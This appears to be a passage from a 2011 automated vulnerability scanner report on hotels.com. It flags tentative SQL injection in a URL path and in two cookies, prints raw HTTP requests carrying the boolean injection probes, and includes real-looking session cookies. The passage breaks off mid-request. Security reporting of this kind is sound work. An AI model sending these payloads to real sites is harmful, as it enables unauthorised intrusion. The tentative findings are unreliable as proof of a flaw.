The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html'%20and%201%3d1--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43425
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXVOCQBT9NdITK6CYL00jaA02hmDpSNM0K7vi2sLifgDx62OzHsyXO3fOufd89A9MYtpHWEJCBTjInN70HAsWqJt2b4Bs0-y2-5LjijAlplDivaJ3KQDtwoMr-8uJUwEMTeM65AhzzUUfGfJjbyVdlE1q2316Tmv3thJO2MRwnMYGwiXkUnGsBfXH0U2y4XETL9l4uD2RpXx8Xe8j0Ckzlos36x0UKt9hHu4nSFEp9A8LgoH30PiRuwWGhDuNWayRdKRmR-ZWrZuY62heDutO56dogPTNJ2s33izcOPkCGBWkBP2GuKhUQg3Nd2Zyii30goNzloJdwQgLSQooCSvOBoUahYliU7_qWMg56Uz-ivowW7USnkKYXRYtiyvhUvyHvgGcIw0SsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

Request 2

GET /hotel/details.html'%20and%201%3d2--%20?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:32:42 GMT
Content-Length: 43617
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:32:42 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAAGVPXU_CMBT9NcynlTEo8mIMG2iGwbGhEGaMKWsZxa0d_dhwv95V9AF5ubk5597z0d1zRfIuJgrRXIK9KvKbjusghtvZ6_Sxa9vtdl8KUlGu5QQpstP5XQpAM_fQsvflxqkElqFJHQpMhOGijwz7sbdUEGfjugefntMa3lbSDU8xGqWxhUmJhNKCGEHzcYBJNjis4wUfDTZHulCPr6tdBFplzgv55rwDpostEeFujHWupPnhQdD3Hk5-BDfAUmhrMIefVD7U0wOHVQMTexXNykHd6vwUDbC5-eTN2puGa7eYA6tCOcW_IS4qlchAs62dHGMHv5DgnIXxKxgTqShDinJ2NmB6GCaaT_yqZZEQtDX5K-qjbNkodAxRdlm0ZFfCpfwPfQNy0k5HsAEAAA..&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
<li>
<a href="/hotel/saved_hotels.html" rel="nofollow"
title="View hotels you've saved">

...[SNIP]...

1.17. http://www.hotels.com/hotel/details.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:47 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:31:48 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...

1.18. http://www.hotels.com/hotel/details.html [channel cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The channel cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the channel cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d1--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; 